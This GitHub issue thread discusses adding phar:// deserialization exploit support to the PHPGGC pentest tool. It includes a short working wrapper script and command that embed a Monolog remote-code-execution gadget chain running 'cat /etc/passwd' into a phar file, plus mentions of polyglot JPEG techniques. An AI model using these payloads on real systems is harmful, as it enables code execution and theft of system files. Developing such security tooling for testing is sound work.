Integrate PHARGGC to PHPGGC

[farisv]

Exploitation on implicit PHP unserialization via phar:// wrapper is commonly needed during pentest. The forked version of PHPGGC with phar exploitation support is available at https://github.com/s-n-t/phpggc. But, since there are many changes in PHPGGC and maybe there will be more changes to PHPGGC in the future, I think it's better to integrate the PHARGGC to main repo of PHPGGC.

[cfreal]

I'm on it :)

[mpchadwick]

I think you could just use the wrapper feature, no?

[mpchadwick]

FYI confirmed this works...

$ cat wrapper.php
<?php

function wrapper($chain) {
    $phar = new Phar('test.phar');
    $phar->startBuffering();
    $phar->addFromString('test.txt', 'text');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata($chain);
    $phar->stopBuffering();
}
$ ./phpggc -w wrapper.php monolog/rce1 system 'cat /etc/passwd'

test.phar will contain monolog RCE payload in this case

[cfreal]

Hi !
I'm currently implementing the phar:// thing, and although using --wrapper works in some cases, it does not allow everything. For instance, the fast destruct technique I implemented last patch (which is bugged btw, patch coming soon) requires us to manually edit the serialized string, so setMetadata($object) won't do. PHPGGC will support TAR, ZIP and PHAR phar files, along with the JPEG polyglot technique @s_n_t described in his BlackHat talk, and some more. Hopefully I'll be done today :)

[cfreal]

Done ! I added a few implementation details for people that are interested. #24

[farisv]

Thank you so much!